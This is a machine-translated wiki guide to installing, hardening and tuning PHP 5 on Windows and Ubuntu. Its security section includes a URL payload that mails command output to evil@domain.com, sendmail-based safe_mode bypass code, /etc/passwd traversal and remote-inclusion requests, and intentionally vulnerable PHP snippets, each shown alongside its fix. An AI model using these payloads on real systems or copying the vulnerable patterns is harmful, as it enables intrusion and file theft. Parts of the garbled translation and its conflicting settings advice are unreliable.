installation
1. First download PHP 5.2.5 (http://www.php.net/downloads.php)
The PHP installation path in this article takes c:\php
2. Download and get php-5.1.2-win32.zip, directly all to the C:\php\ directory can be php file storage directory c:\php;
3. Then copy all DLL files under C:\php\ to C:\Windows\system32 (Win2000 system c:/winnt/system32/), overwriting existing DLL files;
4. Php.ini-dist with Notepad to search and modify using Notepad's lookup function:
Search
CODE:
register_globals = Off
Change off to ON, i.e. get register_globals = on;
Note: this corresponds to PHP's global variable function, consider a lot of PHP programs need global variable function so open, please note the rigor of the-php program, if you do not need to recommend do not modify to keep the default off state
Search Again
CODE:
Extension_dir =
and point its path to your PHP directory in the EXT directory, modified to Extension_dir = "C:/php/ext"
Create a folder under c:\php and name tmp
Find
CODE:
; upload_tmp_dir =
Upload_tmp_dir the line's annotation character, that is, the preceding semicolon ";", so that the line works in the php.ini document. Upload_tmp_dir is used to define the temporary path to upload files, where you can also modify and define an absolute path, where the directory set must have read and write permissions.
Here I set to Upload_tmp_dir = C:/php/tmp (that is, the folder that was created earlier)
Search to find
CODE:
; Windows Extensions
To precede with a number of commonly used items;
Code:;
extension=php_mbstring.dll
code:;
extension=php_curl.dll
code:
; extension=php_ Dbase.dll
CODE:
; extension=php_gd2.dll
This is used to support the GD library, the general need, must choose
Code:
; extension=php_ldap.dll
code:
extension=php_zip.dll
code:
; extension=php_ Mysql.dll
Remove the front ";"
Find
CODE:
; session.save_path =
To remove the front number, this article sets it to
Session.save_path = c:/php/tmp
Other you can choose to remove the previous one; then save the file as PHP.ini to C:\Windows (C:\WINNT under Windows 2000), and note that changing the file suffix name is ini to get C:\Windows\php.ini ( C:\WINNT\php.ini under Windows 2000)
Common Security Settings
One, Web server security
PHP is nothing but a Web server module function, so first of all to ensure the security of the Web server. Of course, the Web server to be secure and must first ensure that the system security, so it is far, endless. PHP can be combined with a variety of Web servers, and only Apache is discussed here. It is highly recommended that you start Apache in a chroot way, so that even if the Apache and PHP and its scripts are compromised, it is only the imprisoned system that is affected and does not compromise the actual system. However, the use of Chroot Apache, the application will also bring some trouble, such as the connection to MySQL must use the 127.0.0.1 address using a TCP connection and can not use the localhost socket connection, which will be a little less efficient. and mail functions to send mail is also a problem
Because of php.ini:
[mail function]
; For Win32.
SMTP = localhost
; For Win32.
Sendmail_from = me@localhost.com
are aimed at the Win32 platform, so need to adjust the chroot environment good sendmail.
second, the problem of PHP itself
1. Remote overflow
PHP-4.1.2 all versions below have a file upload remote buffer Overflow vulnerability, and the attack program has been widely circulated, the success rate is very high.
2. Remote denial of service
PHP-4.2.0 and PHP-4.2.1 exist PHP multipart/form-data POST request processing remote vulnerabilities, although they do not have local user rights, but can also cause a denial of service.
3.safe_mode Bypass Vulnerability
There are PHP-4.2.2. The PHP mail function bypasses the Safe_mode limit to execute a command vulnerability, and the 4.0.5 Start Mail function adds a fifth parameter, because the designer can break through the Safe_mode restrictions to execute the command. 4.0.5 version of the breakthrough is very simple, just separated by semicolons with the shell command, such as the existence of PHP script evil.php:
Perform the following URL:
http://foo.com/evil.php?bar=;/usr/bin/id mail evil@domain.com
This sends the result of the ID execution to evil@domain.com.
For 4.0.6 to 4.2.2 PHP breakthrough Safe_mode limit is actually taking advantage of the SendMail-c parameter, so the system must be using SendMail. The following code can break through the Safe_mode limit execution command:
Note that the following two must not exist, or that
their owners of this script are the same
$script = "/tmp/script123";
$CF = "/tmp/cf123";
$FD = fopen ($CF, "w");
Fwrite ($FD, "oq/tmp
sparse=0
r$*". Chr (9). "$ #local $@ $: $
mlocal, p=/bin/sh, A=sh $script");
Fclose ($FD);
$FD = fopen ($script, "w");
Fwrite ($FD, "Rm-f $script $cf;");
Fwrite ($FD, $cmd);
Fclose ($FD);
Mail ("Nobody", "" "," "," ","-C$CF ");
? >
Or use the above problematic version of PHP users must upgrade to the latest version in time, so as to eliminate basic security issues.
Third, PHP's own security configuration
PHP is very flexible and can be set by PHP.ini, httpd.conf,. htaccess files (the directory must have allowoverride all or options), and you can use Ini_set in a script program () and other specific functions to set it up. The Phpinfo () and Get_cfg_var () functions can be used to get the individual values of the configuration options.
If the configuration options are unique Php_ini_system properties, they must be modified by php.ini and httpd.conf, which modifies the master value of PHP, but must be restarted to take effect after modification. Where the php.ini setting option is for all scripts in the Web server to take effect, the option set in httpd.conf is for all scripts in the defined directory to take effect.
If there are other Php_ini_user, Php_ini_perdir, the Php_ini_all property option can use the. htaccess file setting, or you can set it by using the Ini_set () function in the script itself, which modifies the local value. It will take effect immediately after the change. However,. htaccess only takes effect on the script program for the current directory, and the Ini_set () function only sets the code for the Ini_set () function on the script to take effect. The option properties for each version may vary, and you can use the following command to find the Main.c file for the current source code with all the options and its properties:
grep php_ini_/PHP_SRC/MAIN/MAIN.C
Before discussing PHP security configuration, you should have a good understanding of PHP's Safe_mode mode.
1.safe_mode
Safe_mode is the only Php_ini_system property that must be set by PHP.ini or httpd.conf. To enable Safe_mode, simply modify
PHP.ini:
Safe_mode = On
or modify httpd.conf, define directory:
Options followsymlinks
php_admin_value safe_mode 1
After restarting Apache, Safe_mode is in effect. Starting Safe_mode will limit many PHP functions, especially those related to system file opening, command execution, and so on.
The function of all operation files will only operate the same file as the script uid, such as the contents of the test.php script:
The properties of several files are as follows:
ls-la total
drwxr-xr-x 2 root 01:25.
Drwxr-xr-x root root 384 June 12:02.
-rw-r--r--1 root 4110 Oct 2002 index.html
-rw-r--r--1 www-data www-data-June 19:14 test.php
In the browser request test.php will prompt the following error message:
Warning:safe MODE restriction in effect. The script whose uid/gid is 33/33 isn't allowed to
access./index.html owned through Uid/gid 0/0 in/var/www/test.php on L INE 1
If the UID of the directory in which the action file is located is consistent with the script UID, the UID of the file can be accessed even if it is different from the script, whether this is a vulnerability in PHP or something else. So PHP script is the owner of this user is best for this purpose, absolutely prohibit the use of root as a PHP script owner, so that can not achieve the effect of safe_mode.
If you want to loosen it to a GID comparison, open safe_mode_gid to consider comparing only the GID of the file, and you can set the following options:
Safe_mode_gid = On
After the Safe_mode is set, all the functions executed by the command will be limited to execute the program in the php.ini safe_mode_exec_dir specified directory, and the shell_exec, ' ls-l ' way of executing the command will be prohibited. If you do need to invoke another program, you can do the following in php.ini:
Safe_mode_exec_dir =/usr/local/php/exec
Then copy the program to the directory, and the PHP script can use functions like system to execute the program. Also, the shell script in the directory can call system commands in other directories.
Safe_mode_include_dir string
Cross Uid/gid checks when this directory and its subdirectories (directories must be included in include_path or with full paths) include files.
Starting with the PHP 4.2.0, this directive accepts a semicolon-delimited path, not just a directory, from a style similar to the include_path instruction. The specified limit is actually a prefix, not a directory name. This means that "Safe_mode_include_dir =/DIR/INCL" will allow access to "/dir/include" and "/dir/incls" if they exist. If you want to control access in a specified directory, add a slash at the end,
For example:"Safe_mode_include_dir =/dir/incl/".
Safe_mode_allowed_env_vars string
Setting some environment variables may be a potential security breach. This directive contains a comma-delimited list of prefixes. In Safe mode, users can only change the environment variables whose names have the prefixes provided here. By default, users can only set environment variables (such as Php_foo = BAR) that start with Php_.
Note: If this directive is empty, PHP will allow users to modify any environment variables!
Safe_mode_protected_env_vars string
This directive contains a comma-delimited list of environment variables that the end user cannot use Putenv () to change these environment variables. Even in
You cannot change these variables when the Safe_mode_allowed_env_vars is set to allow modifications.
Although Safe_mode is not a panacea (low version of PHP can be bypassed), it is strongly recommended to open Safe mode to some extent to avoid unknown attacks. However, enabling Safe_mode can have many limitations and may have an impact on the application, so you need to adjust the code and configuration to be harmonious. Functions that are restricted or masked by Safe mode can refer to the PHP manual.
After discussing Safe_mode, the following is a discussion of how to avoid vulnerabilities by configuring the PHP server side, in conjunction with the actual problems that can arise from the program code.
2. Variable abuse
php default register_globals = On, for Get, POST, cookies, environment, session variables can be directly registered as global variables. Their registration order is Variables_order = "Egpcs" (Can be modified by php.ini), with the same name variable variables_order the right side of the overlay to the left, so the misuse of variables is very easy to cause confusion in the program. and scripting programmers often don't have the habit of initializing variables, like the following pieces of a program are extremely vulnerable to attack:
test_1.php
if ($pass = = "Hello")
$auth = 1;
if ($auth = = 1)
echo "Some important information";
else
echo "nothing";
? >
An attacker can bypass the check only with the following request:
Http://victim/test_1.php?auth=1
Although this is a very retarded error, but some well-known programs have made such a mistake, such as Phpnuke remote file copy vulnerability: http://www.securityfocus.com/bid/3361
When PHP-4.1.0 is released, it is recommended to turn off Register_globals and provide 7 special array variables to use the various variables. Variables that come from Get, POST, cookie, etc. are not registered directly as variables and must be accessed through array variables. When PHP-4.2.0 is released, the php.ini default configuration is Register_globals = off. This allows the program to use PHP itself to initialize the default value, generally 0, to avoid the attacker to control the judgment variable.
Workaround:
Configuration file php.ini set
register_globals = off. The
programmer is required to initialize a value at the beginning of the program as a variable of judgment.
3, File open
An extremely vulnerable code fragment:
//test_2.php
if (!) ( $str = ReadFile ("$filename"))) {
echo ("Could not open file:
\ n");
Exit;
}
else {
echo $str;
}
? >
Because an attacker could specify arbitrary $filename, an attacker could see the/etc/passwd with the following request:
http://victim/test_2.php?filename=/etc/passwd
The following request can read the PHP file itself:
http://victim/test_2.php?filename=test_2.php
PHP File Open function also has fopen (), file (), etc., if the file name variable check is not strict will cause server important files are accessed read.
Workaround:
For special needs, restrict PHP file operations to the Web directory.
Here is an example of modifying the Apache configuration file httpd.conf:
php_admin_value Open_basedir/usr/local/apache/htdocs
After restarting Apache, the PHP script in the/usr/local/apache/htdocs directory can only manipulate files under its own directory, otherwise PHP will complain:
Warning:open_basedir restriction in effect.
The File is in wrong directory in XXX at line xx.
This problem can also be avoided by using the safe_mode pattern, as discussed earlier.
4. Include file
An extremely vulnerable code fragment:
//test_3.php
if (file_exists ($filename))
include ("$filename");
? >
This irresponsible code can cause considerable harm by using the following request for an attacker to obtain a/etc/passwd file:
http://victim/test_3.php?filename=/etc/passwd
If the UNIX version of PHP (win version of PHP does not support remote open files), an attacker could create a file containing a shell command on a machine that has an HTTP or FTP service on it, such as Http://attack/attack.txt, The following requests can then execute commands on the target host ls/etc:
Http://victim/test_3.php?filename=http://attack/attack.txt
Attackers can even get code to execute commands by including Apache log files Access.log and Error.log, but because of the too much interference information, sometimes it is not easy to succeed.
For another form, the following code fragment:
//test_4.php
include ("$lib/config.php");
? >
An attacker can create a config.php file on its own host that contains the execution command code, and then execute commands on the target host with the following request:
Http://victim/test_4.php?lib=http://attack
PHP contains functions include (), include_once (), require (), require_once. If you do not check for the containing file name variable, the system poses a serious risk and you can execute commands remotely.
Workaround:
Require the programmer to include the parameters in the file as far as possible not to use variables, if the use of variables, we must strictly check the file name to include, must not be arbitrarily specified by the user.
restricting the PHP operation path in the previous file opening is a necessary option. Also, be sure to turn off PHP's remote file opening function, if you don't need it specifically.
Modify php.ini file:
allow_url_fopen = Off
Restart Apache.
5, File upload
PHP's file upload mechanism is to save the user uploaded files in the php.ini Upload_tmp_dir defined temporary directory (default is the system's temporary directory, such as:/tmp) in a similar phpxxuoxg random temporary file, the program execution ended, the temporary file was also deleted. PHP defines four variables for uploaded files: (for example, the form variable name is file and Register_globals opens)
$file #就是保存到服务器端的临时文件 (such as/TMP/PHPXXUOXG)
$file _size #上传文件的大小 $file _name #上传文件的原始名称 $file
_type #上传文件的类型
Recommended use:
$HTTP _post_files["File" ["Tmp_name"]
$HTTP _post_files["File" ["Size"]
$HTTP _post_files[ ' File ' [' name ']
$HTTP _post_files[' file ' [' type ']
This is one of the simplest file upload codes:
test_5.php
if (isset ($upload) && $file!= "None") {
copy ($file, "/usr/local/apache/htdocs/upload/ ". $file _name);
echo "File". $file _name. " Upload success! Click Continue to upload ";
Exit;
}
? >
content= "text/html charset=gb2312" >
Such uploading code has significant problems reading arbitrary files and executing commands.
Common performance Settings
First , we edit the /etc/php5/apache2/php.ini file, do the general configuration, before the change, please make a backup of the profile. So that you can recover when you make a mistake.
>memory_limit = 8M => modified to your desired memory size
>upload_max_filesize = 2M => modify file maximum upload size
>extension=mysql.so support for MySQL service
>extension=gd.so support GD function
In fact, under Ubuntu, if you install the Php5-mysql and PHP5-GD, you will automatically modify the above two lines, we do is just to confirm that their previous annotation is removed.
add : 1. At present, most of the open source PHP is written in PhP4, in order to compatible with the previous PHP version, sometimes need to register_long_arrays open, otherwise $http_get_vars and $HTTP_ Post_vars and other variables will not work, there will be some inexplicable problems.
2. In addition, after loading php5, it is best to confirm the/etc/apache2/mods-enabled/whether there is a link: php5.load->/etc/apache2/mods-available/php5.load
second, strengthen the PHP to enhance security.
Note that the security below depends on the situation, so I've already written down their functionality, and if there's a problem, see if any of the following restrictions are causing it to be commented out accordingly.
Below we begin to strengthen PHP, we edit/etc/php5/apache2/php.ini file again, the reason is not once changed, the main is to give everyone a clear idea.
1. Open Safe Mode, open his advantage is that the PHP file can only access the owner and PHP files have the same file, even in the chroot environment can not access the jail is not the same file, similar to the PHP shell such a backdoor is useless oh, Phpshell is a popular PHP backdoor, he can execute system commands, just like his name, and Shell very close.
Safe_mode = On
2. The following settings limit the fopen (), file () and other functions can operate the directory scope, to avoid the intruder illegally read the file, must be added "/" Behind the/var/www, or/var/wwww under the file can be accessed. This option prevents any PHP files that are not in the/var/www/directory from running, including any programs that link to the/var/www/directory in a soft link, such as the phpMyAdmin package, which does not function correctly when the option is set.
Open_basedir =/var/www/
3. Prohibit the use of phpinfo and Get_cfg_var functions, so that you can avoid leaking service information, generally in the confirmation of PHP can be normal work and then shut down
Disable_functions = Phpinfo,get_cfg_var
4. Set the PHP program error log
error_reporting = E_all
log_errors = on
error_log =/var/log/php_err.log
5. If the PHP program does not indicate the need for register_globals, it is best to set the register_globals to off, which can avoid a lot of security problems. Note that if your program needs to be register_globals, do not turn it off. Ubuntu is off by default.
Register_globals = Off
6. Do not open the remote address, remember the recent PHP include that vulnerability? is to include a variable in a PHP program, then the intruder can use the control server to execute a remote PHP program locally, such as Phpshell, so we close this.
Allow_url_fopen = Off
Install Zend Optimizer
After downloading to get Zendoptimizer-3.3.0a-windows-i386.exe, directly double-click the installation, the installation process to select the Web server, select Apache 2.x, and then prompts you to restart Web server, select the , before completing the installation prompts whether to back up the php.ini, the point determines after the installation completes. I am installing here to c:\php5\Zend, as shown in Figure 4.1
Figure 4.1 Installation path
Figure 4.2 Server Type
Figure 4.3 php.ini directory
Figure 4.4 Apache Directory
Figure 4.5 Complete installation Information
The Zend Optimizer Installation Wizard automatically modifies the php.ini to help you start the engine based on your selections. The following is a brief introduction to the configuration options for Zend Optimizer. The following is the default configuration code in php.ini after the installation is completed:
Zend Optimizer Module installation path on hard disk
Zend_extension_ts= "C:\php5\Zend\lib\ZendExtensionManager.dll"
the directory where the optimizer resides, with no modification required by default
Zend_extension_manager.optimizer_ts= "C:\php5\Zend\lib\Optimizer-3.3.0a"
optimization, where you define how many optimizations to start, the default value is 15, which means that you open 1-4 of the 10 optimization processes at the same time, we can change this value to 1023, which means that all 10 optimizations are turned on.
zend_optimizer.optimization_level=1023
when the phpinfo () function is invoked, it displays:
Zend Engine v1.3.0, Copyright (c) 1998-2004 Zend Technologies with Zend Extension Manager v1.0.9, Copyright (c) 2003-2006, By Zend Technologies and Zend Optimizer v3.3.0a, Copyright (c) 1998-2006, by Zend Technologies
indicates that the installation was successful .
Taken from "http://wiki.lupaworld.com/index.php/PHP_5.x"